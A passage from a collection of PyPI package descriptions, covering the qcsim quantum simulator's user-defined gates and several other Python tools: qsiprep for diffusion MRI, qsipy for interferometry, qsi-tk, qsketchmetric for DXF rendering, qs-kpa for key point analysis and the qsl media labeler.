5. CREATING USER DEFINED GATES (see the accompanying user_def_gates.py) Qcsim allows using user-defined gates. A user-defined gate is written as a function that returns a Python array with two elements [name_string, unitary_matrix]. The element unitary_matrix is the matrix that specifies the gate. It should be created using numpy.matrix([...],dtype=complex), or equivalent. The element name_string is a string that is a user-friendly name for that gate, used in logs and debug traces. Here is an example of a simple way for a user to define a CNOT gate --
def myCNOT():\n\treturn [\"MY-CNOT\", numpy.matrix([[1,0,0,0],[0,1,0,0],[0,0,0,1],[0,0,1,0]],dtype=complex)]As shown in the code above, while writing the unitary_matrix for myCNOT we assume that the entire system has only 2 qubits. Now, since in this definition of CNOT the higher-order qubit (MSB) is the controlling qubit, when applying this gate to any two qubits, say 4 and 7, where, say, bit 4 is the controlling qubit, the qgate() function would be invoked as --qc.qgate(myCNOT(),[4,7])Or, if qubit 7 is to be the controlling qubit, then as --qc.qgate(myCNOT(),[7,4])Qclib does all the trickery required to convert the gate matrix to handle all the qubits of the system, performing the gate operation only on the specific qubits. So, in general, if the gate operates on n qubits, it should be written as if the entire system consists of only n qubits, and when calling qgate(), the order of qubits should be [MSB, ..., LSB]. The system looks at the size of the matrix specifying the gate to determine the number of qubits required for that gate. If the number is incorrect, it throws an exception. Since the gate is defined in the form of a function, it can take arguments. For instance, for a rotation gate, the rotation angle can be passed as an argument --def myR(theta):\n\tc = numpy.cos(theta)\n\ts = numpy.sin(theta)\n\treturn [\"MY-Rotation({:0.4f})\".format(theta), numpy.matrix([[1,0],[0,complex(c,s)]],dtype=complex)]\nqc.qgate(myR(numpy.pi/2),[5])(Note: To see some change in the state, perform an X() or H() or some such gate on the qubit before the phase rotation.)
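Before using a hand-written gate it can be worth confirming that its matrix really is unitary, using qsim.qisunitary() from section 3.3. A small sketch (myS below is a hypothetical example gate in the same [name_string, unitary_matrix] format, and it is assumed that qisunitary() accepts that structure, just as qgate() does):
import qsim
import numpy

def myS():
	# user-defined phase gate, written as if the whole system had just 1 qubit
	return [\"MY-S\", numpy.matrix([[1,0],[0,1j]],dtype=complex)]

print(qsim.qisunitary(myS()))   # expected output: True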
6. ERROR HANDLING, EXCEPTIONS Various function calls raise exceptions, mostly in cases where user-passed arguments are incorrect. The exceptions are raised using the class qsim.qSimException. Following is an example showing how these exceptions are handled --import qsim\nfrom qSimException import *\ntry:\n\tqc = qsim.QSimulator(8)\n\tqc.qgate(qsim.H(),[0])\n\tqc.qgate(qsim.C(),[0,1])\nexcept qSimException as exp:\n\tprint(exp.args)Following is the list of error messages, with the name of the function, thrown in an exception -- (TBD with the latest list)"} +{"package": "qsiprep", "pacakge-description": "qsiprep borrows heavily from FMRIPREP to build workflows for preprocessing q-space images\nsuch as Diffusion Spectrum Images (DSI), multi-shell HARDI and compressed sensing DSI (CS-DSI).\nIt utilizes Dipy and ANTs to implement a novel high-b-value head motion correction approach\nusing q-space methods such as 3dSHORE to iteratively generate head motion target images for each\ngradient direction and strength. Since qsiprep uses the FMRIPREP workflow-building strategy, it can also generate methods\nboilerplate and quality-check figures. Users can also reconstruct orientation distribution functions (ODFs), fiber orientation\ndistributions (FODs) and perform tractography, estimate anisotropy scalars and perform connectivity\nestimation using a combination of Dipy, MRTrix and DSI Studio using a JSON-based pipeline\nspecification. [Documentation: qsiprep.org]"} +{"package": "qsiprep-container", "pacakge-description": "This package is a basic wrapper for qsiprep that generates the appropriate\nDocker commands, providing an intuitive interface to running the qsiprep\nworkflow in a Docker environment."} +{"package": "qsipy", "pacakge-description": "Python package about interferometry using two-mode quantum states. This package provides functions that return various physical quantities related to interferometry experiments using twin Fock states $|n,n\rangle$ or two-mode squeezed vacuum states. The functions contained in this package are derived in this article (DOI: paper published soon). Quick context explanation: The scheme of the experiment that we are considering is represented in the figure below: twin Fock or two-mode squeezed states are used as input in a Mach-Zehnder interferometer; the detection suffers from a non-unit quantum efficiency $\eta$; experimentalists are interested in the measurement of the phase difference $\phi$ between the two arms; the observable $\hat{O}$ that one uses to perform a measurement is the square of the half difference of particles detected at both output ports $\hat{c}_1$ and $\hat{c}_2$, whose expectation value is actually the variance of the half difference of particles detected (cf. note below): $$\hat{O} = \frac{1}{4} \left( \hat{N}_{c_2} - \hat{N}_{c_1} \right)^2$$ A detailed explanation of the derivation of the formulae is given in the supplemental material of the article. (Note): indeed, $\langle\hat{N}_{c_2}-\hat{N}_{c_1}\rangle=0$ and therefore $$4\times\mathrm{Var}\left[\hat{O}\right]=\left\langle\left(\hat{N}_{c_2}-\hat{N}_{c_1}\right)^2\right\rangle-\left\langle\hat{N}_{c_2}-\hat{N}_{c_1}\right\rangle^2=\left\langle\left(\hat{N}_{c_2}-\hat{N}_{c_1}\right)^2\right\rangle$$ Installation. Method 1: download from PyPI (recommended for users). This package is published in the PyPI repository; it can be added to any Python environment with\nthe one-liner: pip install qsipy. Or with any other Python packaging and dependency manager, such as poetry: poetry add qsipy.
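After installing, a minimal smoke test might look like the following sketch (the tfs module and the function below are the ones documented in the User guide further down; the exact import path is an assumption based on the src/qsipy layout shown there):
from qsipy import tfs

# phase uncertainty at the optimal working point for N = 1000 particles
# detected with quantum efficiency eta = 0.95 (signature as documented below)
print(tfs.phase_uncertainty_at_optimal_phi_vhd(N=1000, eta=0.95))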
Method 2: cloning from the source (for contributors). You may also clone this project and use it right away. Since it is only Python scripts,\nno compilation is needed. The functions of interest are defined in two separate modules: src/qsipy/tfs.py $\Rightarrow$ for the functions related to the twin Fock states; src/qsipy/tms.py $\Rightarrow$ for the functions related to the two-mode squeezed vacuum states. Examples. N.B. the gain in decibels (relative to the standard quantum limit) is defined as: $$ G = 20 \log \left[ \sqrt{\eta N} \, \Delta \phi \right]$$ 1. Phase uncertainty $\Delta \phi$ as a function of the measured phase difference. The following figure shows the ratio between the phase sensitivity achieved with those two quantum states and the shot-noise. The quantum efficiency is set to $\eta = 0.95$. It shows in particular that interferometry below the standard quantum limit (SQL) can be obtained in specific ranges of phase differences $\phi$. The source code generating this figure can be found here. 2. Maps of the optimal $\phi_0$ to measure, and sub-shot-noise domains. Example 1 exhibited the fact that (for given quantum efficiency $\eta$ and number of particles $N$) there is an optimal phase difference $\phi_0$ to measure, in order to minimize the measurement uncertainty $\Delta \phi$. One can plot the maps of those optimal phases in the $(\eta,N)$ plane, and identify the regions where sub-shot-noise interferometry may be performed. TF stands for twin Fock state; TMS stands for two-mode squeezed vacuum state. The source code generating this figure can be found here. 3. Asymptotic behaviour of the phase uncertainty. Knowing the optimal phase $\phi_0$ to estimate, one can study the asymptotic behaviour of $\Delta \phi_0 = \left.\Delta \phi\right|_{\phi=\phi_0}$. One can therefore check that as soon as $\eta \neq 1$, $\Delta \phi_0$ has a $\mathcal{O}(N^{-1/2})$ scaling, and therefore improves on the standard quantum limit only by a constant factor.\nHere is a visualization of this asymptotic behaviour in the case $\eta = 0.95$. The source code generating this figure can be found here. User guide. Currently the package is organized in two main modules, tfs and tms, containing essentially the same functions, but considering either twin Fock or two-mode squeezed states at the input. Important abbreviations: for the sake of compactness we use the following abbreviations in the names of the functions provided by qsipy: ev stands for \"expectation value\"; vhd stands for \"variance of the half difference\"; qe stands for \"quantum efficiency\" (i.e.
the value of $\\eta$)Here is the listing of the useful functions that one can use, callingtfs.myfunctionortfs.myfunction:Most important functionsdefphase_uncertainty_vhd(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the phase uncertainty during an interferometry experiment using- twin-Fock or two-mode squeezed states at the input (depending from which modulethe function has been called);- considering the variance of the half difference of particles detected at theoutput as the observable of interest;This function only calls either \"phase_uncertainty_vhd_perfect_qe\" or\"phase_uncertainty_vhd_finite_qe\", depending on the value of eta that it is set asargument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Phase uncertainty.\"\"\"defoptimal_phi_vhd(N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the optimal phase to estimate (minimizing the resolution) during aninterferometry experiment using detectors with finite quantum efficiency andconsidering the variance of the half difference of particles detected at the outputas the observable of interest. The detectors have a finite quantum efficiency eta.Parameters----------N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Optimal phase to estimate experimentally.\"\"\"defphase_uncertainty_at_optimal_phi_vhd(N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the resolution at the optimal phase to estimate during an interferometryexperiment using detectors with finite quantum efficiency eta and considering thevariance of the difference of particles at the output as the observable of interest.This function is therefore just:phase_resolution_difference_finite_qe(optimal_phi_vhd(n, eta), n, eta)Parameters----------N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Optimal resolution.\"\"\"Functions with more specific usagedefev_vhd(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the expectation value of the variance of the half difference of number ofparticles detected at both output ports of the interferometer.Since the expectation value of the difference itself is zero, the variance isactually equal to the expectation value of the square of the difference.This function only calls either \"ev_vhd_perfect_qe\" or \"ev_vhd_finite_qe\", dependingon the value of eta that it is set as argument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Average total number of particles in the interferometer.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 
1.Returns-------float | npt.NDArray[np.float_]Expectation value: <(1/4) * (N_output1 - N_output2) ** 2>\"\"\"defev_vhd_squared(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the expectation value of the power four of the half difference of numberof particles detected at both output ports of the interferometer.This function only calls either \"ev_vhd_squared_perfect_qe\" or\"ev_vhd_squared_finite_qe\", depending on the value of eta that it is set asargument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Expectation value: <(1/16) * (N_output1 - N_output2) ** 4>\"\"\"deffluctuations_vhd(phi:float|npt.NDArray[np.float_],N:float|npt.NDArray[np.float_],eta:float|npt.NDArray[np.float_]=1,)->float|npt.NDArray[np.float_]:\"\"\"Returns the quantum fluctuations of the variance of the half difference of numberof particles detected at both output ports of the interferometer.This function only calls either \"fluctuations_vhd_perfect_qe\" or\"fluctuations_vhd_finite_qe\", depending on the value of eta that it is set asargument.Parameters----------phi : float | npt.NDArray[np.float_]Phase difference between both arms of the interferometer.N : float | npt.NDArray[np.float_]Total number of particles.eta : float | npt.NDArray[np.float_], optionalQuantum efficiency of the detector, must be between 0 and 1, by default 1.Returns-------float | npt.NDArray[np.float_]Expectation value: \"\"\"defasymptotic_ratio_phase_uncertainty_to_SQL_at_optimal_phi_vhd(eta:float|npt.NDArray[np.float_],)->float|npt.NDArray[np.float_]:\"\"\"Returns the asymptotic limit (as the number of particles goes to infinity) of the ratio between:- the phase uncertainty at the optimal phase and considering the variance of the half differenceof particles detected at the output as the observable of interest- the SQL 1/sqrt(eta N).It only depends on the quantum efficiency of the detectors.Parameters----------eta : float | npt.NDArray[np.float_]Quantum efficiency of the detector, must be between 0 and 1.Returns-------float | npt.NDArray[np.float_]Optimal phase uncertainty to SQL ratio in the asymptotic limit of N.\"\"\""} +{"package": "qsi-tk", "pacakge-description": "qsi-tkData science toolkit (TK) from Quality-Safety research Institute (QSI)Installationpip install qsi-tkContentsThis package is a master library containing various previous packages published by our team.modulesub-moduledescriptionstandalone pypi packagepublicationqsi.ioFile I/O, Dataset loadingTODO qsi-tk open datasets with algorithmsqsi.io.augData augmentation, e.g., generative modelsTODO Data aug with deep generative models. e.g., \" variational autoencoders, generative adversarial networks, autoregressive models, KDE, normalizing flow models, energy-based models, and score-based models. \"qsi.io.preData processing, e.g., channel alignment and 1D-laplacian kernel fs for e-nose data; x-binning, baseline removal for TOF MS.TODOqsi.visPlottingqsi.cscompressed sensingcs1Adaptive compressed sensing of Raman spectroscopic profiling data for discriminative tasks [J]. 
Talanta, 2020, doi: 10.1016/j.talanta.2019.120681Task-adaptive eigenvector-based projection (EBP) transform for compressed sensing: A case study of spectroscopic profiling sensor [J]. Analytical Science Advances. Chemistry Europe, 2021, doi: 10.1002/ansa.202100018Compressed Sensing library for spectroscopic profiling data [J]. Software Impacts, 2023, doi: 10.1016/j.simpa.2023.100492Secured telemetry based on time-variant sensing matrix \u2013 An empirical study of spectroscopic profiling, Smart Agricultural Technology, Volume 5, 2023, doi: 10.1016/j.atech.2023.100268qsi.fsqsi.fs.nch_time_series_fsmulti-channel enose data fs with 1d-laplacian conv kernel\u57fa\u4e8e\u7535\u5b50\u9f3b\u548c\u4e00\u7ef4\u62c9\u666e\u62c9\u65af\u5377\u79ef\u6838\u7684\u5976\u7c89\u57fa\u7c89\u4ea7\u5730\u9274\u522bqsi.fs.glassoStructured-fs of Raman data with group lassoin progressqsi.kernelkernelsacklAnalytical chemistry kernel library for spectroscopic profiling data, Food Chemistry Advances, Volume 3, 2023, 100342, ISSN 2772-753X, https://doi.org/10.1016/j.focha.2023.100342.qsi.drqsi.dr.metricsDimensionality Reduction (DR) quality metricspyDRMetrics, wDRMetricspyDRMetrics - A Python toolkit for dimensionality reduction quality assessment, Heliyon, Volume 7, Issue 2, 2021, e06199, ISSN 2405-8440, doi: 10.1016/j.heliyon.2021.e06199.qsi.dr.mfmatrix-factorization based DRpyMFDRMatrix Factorization Based Dimensionality Reduction Algorithms - A Comparative Study on Spectroscopic Profiling Data [J], Analytical Chemistry, 2022. doi: 10.1021/acs.analchem.2c01922qsi.claqsi.cla.metricsclassifiability analysispyCLAMs, wCLAMsA unified classifiability analysis framework based on meta-learner and its application in spectroscopic profiling data [J]. Applied Intelligence, 2021, doi: 10.1007/s10489-021-02810-8pyCLAMs: An integrated Python toolkit for classifiability analysis [J]. SoftwareX, 2022, doi: 10.1016/j.softx.2022.101007qsi.cla.ensemblehomo-stacking, hetero-stacking, FSSEpyNNRWSpectroscopic Profiling-based Geographic Herb Identification by Neural Network with Random Weights [J]. Spectrochimica Acta Part A: Molecular and Biomolecular Spectroscopy, 2022, doi: 10.1016/j.saa.2022.121348qsi.cla.kernelkernel-NNRWqsi.cla.nnrwneural networks with random weightsqsi.pipelineGeneral data analysis pipelines.qsi.guiWeb-based apps. e.g., `python -m qsi.gui.chaihu` will launch the app for bupleurum origin discrimination."} +{"package": "qsketchmetric", "pacakge-description": "QSketchMetricis a Python 2Dparametric DXFCAD rendering engine. Parametrization is done usingQCAD Professional software\u26a1\ufe0f Quickstartfromqsketchmetric.rendererimportRendererfromezdxfimportnewfromezdxfimportunitsoutput_dxf=new()output_dxf.units=units.MMinput_parametric_dxf_path='tutorial.dxf'input_variables={\"h\":50}renderer=Renderer(input_parametric_dxf_path,output_dxf,variables=input_variables)renderer.render()output_dxf.saveas('tutorial_rendered.dxf')\ud83d\udcf7 Demo showcase\u2699\ufe0f InstallationThe most common case is the installation bypip package manager:pipinstallqsketchmetric\ud83d\udcd0 DXF ParametrizationParametrization is done usingQCAD Professional software.\nYou can download thefree trialversion of the software and use it for parametrization of your DXF files.\nWe need to use it because it is the only software that supports adding custom data to DXF entities.See docs to learn more...\u2705 QSketchMetric ValidatorTo verify the proper parametrization of a DXF file during parametrization process, use theQSketchMetric Validator. 
It is a web application that\nallows you to upload DXF file and check if it is properly parametrized.\nIn the event of an error, the app will give you full debug report. Including\nplace where the error occurred in the DXF file and the error message.See docs to learn more...\ud83c\udfaf FeaturesParametricDXFrenderingEasy dxf files parametrization usingQCAD Professional softwareExplicit support for parametrization ofLINE,CIRCLE,ARC,POINTentitiesSupport for parametrization ofLWPOLYLINE,POLYLINE,SPLINE,ELLIPSE,MTEXT,TEXTetc.entities usingINSERTentity.Open source and daily maintained\ud83d\udcda DocumentationDocumentation is available atQSketchMetric docs\ud83d\udcc8 RoadmapExplicit support for more entities is planned in the future. If you have any suggestions, please create an issue.\nIf you want to contribute, seeHow to contributesection in the documentation. I am open to any suggestions\nand waiting for your pull requests!\u26a0\ufe0f LicenseQSketchMetric is licensed under theMITlicense.\nWhen using the QSketchMetric in your open-source project I would be grateful for a reference to the repository.\ud83c\udfc6 Hall of fameThis project exists thanks to all the people who contribute. Thank you!"} +{"package": "qs-kpa", "pacakge-description": "\ud83c\udfc5Quantitative Summarization \u2013 Key Point Analysis\ud83c\udfc5Keypoint AnalysisThis library is based on the Transformers library by HuggingFace.Keypoint Analysisquickly embeds the statements with the provided supported topic and the stances toward that topic. It is a part of our approach in theQuantitative Summarization \u2013 Key Point Analysisshared task byIBM. We use the ArgKP dataset (Bar-Haim et al., ACL-2020), which contains ~24K argument/key-point pairs, for 28 controversial topics in our training and evaluation.What's NewJuly 1, 2021First release ofqs-kpapython packageJuly 4, 2021Our method achieved the 4th position in track I of the shared task[paper]InstallationInstall with pip (stable version)pipinstallqs-kpaInstall from sources (latest version)gitclonehttps://github.com/VietHoang1512/KPA\npipinstall-e.Quick exampleCurrently, a pretrained KPA encoder withRoBERTabackbone is available, which can be automatically downloaded from Google Drive when initializing theKeyPointAnalysisinstance. We used the 4 last hidden state representations of the [CLS] token as the whole sentence embedding and trained it withTupletMarginLossandIntraPairVarianceLosson the ArgKP dataset. For the code, seemain.py.# Import needed librariesfromqs_kpaimportKeyPointAnalysis# Create a KeyPointAnalysis model# Set from_pretrained=True in order to download the pretrained modelencoder=KeyPointAnalysis(from_pretrained=True)# Model configurationprint(encoder)# Preparing data (a tuple of (topic, statement, stance) or a list of tuples)inputs=[(\"Assisted suicide should be a criminal offence\",\"a cure or treatment may be discovered shortly after having ended someone's life unnecessarily.\",1,),(\"Assisted suicide should be a criminal offence\",\"Assisted suicide should not be allowed because many times people can still get better\",1,),(\"Assisted suicide should be a criminal offence\",\"Assisted suicide is akin to killing someone\",1),]# Go and embedd everythingoutput=encoder.encode(inputs,convert_to_numpy=True)In acomparisonwith the baseline model-which directly uses sentence embedding from RoBERTa model, in a subset of ArgKP dataset (for avoiding target leakage), our model strongly outperforms and exhibits rich representation learning capacity. 
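Continuing the Quick example above, the returned embeddings can be compared directly; a small sketch with numpy (assuming encode() returns one embedding row per input tuple, which is an assumption about the output shape):
import numpy as np

# output comes from encoder.encode(inputs, convert_to_numpy=True) in the Quick example above
norm = output / np.linalg.norm(output, axis=1, keepdims=True)
print(norm @ norm.T)   # pairwise cosine similarities between the three statements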
Evaluation metrics (relaxed and strict mean Average Precision) are retained from theKPA_2021_shared_task.Model using roBERTa directly: mAP strict = 0.4633403767342183 ; mAP relaxed = 0.5991767005443296\nOur pretrained model: mAP strict = 0.9170783671441644 ; mAP relaxed = 0.9722347939653511Detailed trainingGiven a pair of key point and argument (along with their supported topic & stance) and the matching score. Similar pairs with label 1 are pulled together, or pushed away otherwise.ModelModelBERT/ConvBERTBORTLUKEDistilBERTALBERTXLNetRoBERTaELECTRABARTMPNetSiamese Baseline\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fSiamese Question Answering-like\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fCustom loss Baseline\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0f\u2714\ufe0fLossConstrastiveOnline ConstrastiveTripletOnline Triplet (Hard negative/positive mining)DistanceEuclideanCosineManhattanUtilsK-foldsFull-flowPseudo-labelGroup the arguments by their key point and consider the order of that key point within the topic as their labels (seepseudo_label). We can now utilize available Pytorch metrics learning distance, losses, miners or reducers from this greatopen-sourcein the main training workflow. For training, we use a key point and some of its positive/negative arguments as a batch. The goal is to minimize the distance between the keypoint and positive arguments as well as the arguments themselves. This is also our best approach (single-model) so far.Training exampleAn example script for training RoBERTa on the ArgKP dataset. It runs in about 15 minutes each fold on a single Google Colab Tesla P100.OUTPUT_DIR=outputs/pseudo_label/roberta-base/echo\"OUTPUT DIRECTORY$OUTPUT_DIR\"mkdir-p$OUTPUT_DIRcpqs_kpa/pseudo_label/models.py$OUTPUT_DIRforfold_idin1234567doecho\"TRAINING ON FOLD$fold_id\"pythonscripts/main.py\\--experiment\"pseudolabel\"\\--output_dir\"$OUTPUT_DIR/fold_$fold_id\"\\--model_name_or_pathroberta-base\\--tokenizerroberta-base\\--distance\"cosine\"\\--directory\"kpm_k_folds/fold_$fold_id\"\\--test_directory\"kpm_k_folds/test/\"\\--logging_dir\"$OUTPUT_DIR/fold_$fold_id\"\\--logging_steps20\\--max_pos30\\--max_neg90\\--max_unknown15\\--overwrite_output_dir\\--num_train_epochs5\\--early_stop10\\--train_batch_size1\\--val_batch_size128\\--do_train\\--evaluate_during_training\\--warmup_steps0\\--gradient_accumulation_steps1\\--learning_rate0.00003\\--margin0.3\\--drop_rate0.2\\--n_hiddens4\\--max_len30\\--statement_max_len50\\--stance_dim32\\--text_dim256\\--num_workers4\\--seed0doneTraining with the previously defined hyper-parameters yields above mentioned mAP score. Other approaches could be found inbin.ContributorsPhan Viet HoangNguyen Duc LongBibTeX@misc{hoang2021qskpa,author={Phan, V.H. & Nguyen, D.L.},title={Keypoint Analysis},year={2021},publisher={GitHub},journal={GitHub repository},howpublished={\\url{https://github.com/VietHoang1512/KPA}}}"} +{"package": "qsl", "pacakge-description": "QSL: Quick and Simple LabelerQSL is a simple, open-source media labeling tool that you can use as a Jupyter widget. More information available athttps://qsl.robinbay.com. 
It supports:Bounding box, polygon, and segmentation mask labeling for images and videos (with support for video segments).Point and range-based time-series labeling.Automatic keyboard shortcuts for labels.Loading images stored locally, on the web, or in cloud storage (currently only AWS S3).Pre-loading images in a queue to speed up labeling.Please note that that QSL is still under development and there are likely to be major bugs, breaking changes, etc. Bug reports and contributions are welcome!Get started by installing usingpip install qsl. Label a folder of images and save the labels to JSON using the standalone interface usingqsl label labels.json images/*.jpg. Check out theColab Notebookfor an example of how to use the Jupyter Widget.ExamplesEach example below demonstrates different ways to label media using the tool. At the top of each are the arguments used to produce the example.To use the example with the Jupyter Widget, useqsl.MediaLabeler(**params)To use the example with the command-line application, useopen(\"project.json\", \"w\").write(json.dumps(params))and then runqsl label project.json.Imagesimportqslparams=dict(config={\"image\":[{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}]},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Cat\"},{\"name\":\"Dog\"}]},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}]}]},items=[{\"target\":\"https://picsum.photos/id/1025/500/500\",\"defaults\":{\"image\":{\"Type\":[\"Dog\"]}}},],)qsl.MediaLabeler(**params)Videosimportqslparams=dict(config={\"image\":[{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}]},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}]}]},items=[{\"target\":\"http://commondatastorage.googleapis.com/gtv-videos-bucket/sample/BigBuckBunny.mp4\",\"type\":\"video\",}],)qsl.MediaLabeler(**params)Image Batchesimportqslparams=dict(config={\"image\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Cat\"},{\"name\":\"Dog\"}]},{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}]},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}]}]},items=[{\"target\":\"https://picsum.photos/id/1025/500/500\",\"defaults\":{\"image\":{\"Type\":[\"Dog\"]}}},{\"target\":\"https://picsum.photos/id/1062/500/500\",\"metadata\":{\"source\":\"picsum\"}},{\"target\":\"https://picsum.photos/id/1074/500/500\"},{\"target\":\"https://picsum.photos/id/219/500/500\"},{\"target\":\"https://picsum.photos/id/215/500/500\"},{\"target\":\"https://picsum.photos/id/216/500/500\"},{\"target\":\"https://picsum.photos/id/217/500/500\"},{\"target\":\"https://picsum.photos/id/218/500/500\"},],batchSize=2)qsl.MediaLabeler(**params)Time Seriesimportqslimportnumpyasnpx=np.linspace(0,2*np.pi,100)params=dict(config={\"image\":[{\"name\":\"Peaks\",\"multiple\":True},{\"name\":\"A or B\",\"freeform\":True},]},items=[{\"target\":{\"plots\":[{\"x\":{\"name\":\"time\",\"values\":x},\"y\":{\"lines\":[{\"name\":\"value\",\"values\":np.sin(x),\"color\":\"green\",\"dot\":{\"labelKey\":\"Peaks\"},}]},\"areas\":[{\"x1\":0,\"x2\":np.pi,\"label\":\"a\",\"labelKey\":\"A or 
B\",\"labelVal\":\"a\",},{\"x1\":np.pi,\"x2\":2*np.pi,\"label\":\"b\",\"labelKey\":\"A or B\",\"labelVal\":\"b\",},],}],},\"type\":\"time-series\",}],)qsl.MediaLabeler(**params)Stacked Imageparams=dict(items=[{\"type\":\"image-stack\",\"target\":{\"images\":[{\"name\":image[\"name\"],\"target\":image[\"filepath\"],\"transform\":cv2.getRotationMatrix2D(center=(0,0),angle=image[\"angle\"],scale=1),}forimageinqsl.testing.files.ROTATED_TEST_IMAGES]},}],config={\"image\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Cat\"},{\"name\":\"Dog\"}],},{\"name\":\"Location\",\"multiple\":False,\"options\":[{\"name\":\"Indoor\"},{\"name\":\"Outdoor\"}],},{\"name\":\"Flags\",\"multiple\":True,\"freeform\":True},],\"regions\":[{\"name\":\"Type\",\"multiple\":False,\"options\":[{\"name\":\"Eye\"},{\"name\":\"Nose\"}],}],},)qsl.MediaLabeler(**params)APIJupyter Widgetqsl.MediaLabeleraccepts the following arguments:config[required]: The configuration to use for labeling. It has the following properties.image[required]: The labeling configuration at the image-level for images, the frame-level for vidos, and the time-series level of time series targets. It is a list of objects, each of which have the following properties:name[required]: The name for the label entry.displayName: The displayed name for the label entry in the UI. Defaults to the same value asname.multiple: Whether the user can supply multiple labels for this label entry. Defaults tofalse.freeform: Whether the user can write in their own labels for this entry. Defaults tofalse.required: Whether the user is required to provide a label for this entry.options: A list of options that the user can select from -- each option has the following properties.name[required]: The name for the option.displayName: The displayed name for the option. Defaults to the same value asname.shortcut: A single-character that will be used as a keyboard shortcut for this option. If not set,qslwill try to generate one on-the-fly.regions[required]: The labeling configuration at the region-level for images and video frames. It has no effect oftime-seriestargets. It is a list of objects with the same structure as that of theimagekey.items[required]: A list of items to label, each of which have the following properties.jsonpath: The location in which to save labels. If neither this property nor the top-leveljsonpathparameters are set, you must get the labels fromlabeler.items.type[optional, default=image]: The type of the labeling target. The options areimage,video, andtime-series.metadata: Arbitrary metadata about the target that will be shown alongside the media and in the media index. Provided as an object of string keys and values (non-string values are not supported).target[optional]: The content to actually label. The permitted types depend on thetypeof the target.Iftypeisvideo,targetcan be:A string filepath to a video.A string URL to a video (e.g.,https://example.com/my-video.mp4)A string URL to an S3 resource (e.g.,s3://my-bucket/my-video.mp4)A string representing a base64-encoded file (e.g.,data:image/png;charset=utf-8;base64,...)Iftypeisimage,targetcan be any of the image types (filepath, URL, base64-encoded file). In addition it can also be:Anumpyarray with shape(height, width, 3). 
The final axis should be color in BGR order (i.e., OpenCV order).Iftypeistime-series, the only permitted type is an object with the following keys:plots[required]: A list of objects representing plots, each of which has the following properties:x[required]: An object with properties:name[required]: The name used for the x-axis.values[required]: An array of numerical values.y[required]: An object with properties:lines[required]: An array of objects, each with properties:name[required]: The name for this line, used for drawing a legend.values[required]: An array of numerical values for this line. It must be the same length asx.values.color[optional]: A string representing a color for the line. Defaults toblue.dot[optional]: An object with the following properties, used to configure what happens when a user clicks on a data point.labelKey[required]: The image-level label to which clicked values should be applied. If a user clicks a data point, the x-coordinate for the clicked dot will be set as the label inlabelKey. If that label has\"multiple\": True, then it is appended to a list of values. If it is\"multiple\": False, then the clicked dot x-coordinate will replace the value inlabelKey.areas[optional]: A list of clickable areas to draw onto the plot, each of which should have the following properties:x1[required]: The starting x-coordinate for the area.x2[required]: The ending x-coordinate for the area.labelKey[required]: The label entry to which this area will write when the user clicks on it.labelVal[required]: The value to which the label entry will be assigned when the user clicks on it.label[required]: The text label that will appear on the area.labels: Labels for the target. When the user labels the item in the interface, this property will be modified.For images, it has the following properties:image: Image-level labels for the image of the form{[name]: [...labels]}wherenamecorresponds to thenameof the corresponding entry in theconfig.imagearray.polygons: Polygon labels for the image of the form:points[required]: A list of{x: float, y: float}values.xandyrepresent percentage of width and height, respectively.labels: An object of the same form as theimagekey 